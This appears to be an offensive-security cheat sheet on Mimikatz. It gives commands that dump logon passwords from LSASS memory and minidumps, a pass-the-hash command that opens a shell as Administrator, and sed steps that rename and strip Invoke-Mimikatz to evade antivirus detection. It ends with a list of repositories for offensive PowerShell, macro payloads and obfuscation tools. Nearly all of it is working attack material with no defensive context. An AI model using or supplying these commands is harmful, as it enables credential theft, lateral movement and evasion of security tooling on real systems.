https://github.com/gentilkiwi/mimikatz
https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz
TLDR:
.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
Extract passwords
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
Pass the hash (on the left-hand side)
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
MimiDawgz (avoid AV detection)
mv Invoke-Mimikatz.ps1 Invoke-MimiDawgz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidawgz/g' Invoke-MimiDawgz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-MimiDawgz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-MimiDawgz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-MimiDawgz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-MimiDawgz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-MimiDawgz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-MimiDawgz.ps1
Ref: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
https://github.com/PowerShellMafia/PowerSploit
Extract passwords from a Windows memory dump
Get-Process lsass | Out-Minidump
mimikatz "sekurlsa::minidump lsass.dmp"
mimikatz # sekurlsa::logonPasswords
https://github.com/EmpireProject/Empire
http://threatexpress.com/2017/05/invoke-hostenum/
http://threatexpress.com/2018/01/hostenum-updates-usage/
https://github.com/danielbohannon/Invoke-Obfuscation
https://github.com/leechristensen/UnmanagedPowerShell
https://github.com/trustedsec/unicorn
https://github.com/peewpw/Invoke-PSImage
https://github.com/curi0usJack/luckystrike
https://github.com/enigma0x3/Generate-Macro
https://github.com/infosecn1nja/MaliciousMacroMSBuild
https://github.com/fireeye/SessionGopher
https://github.com/samratashok/nishang
https://github.com/NetSPI/PowerUpSQL
https://github.com/JavelinNetworks/HoneypotBuster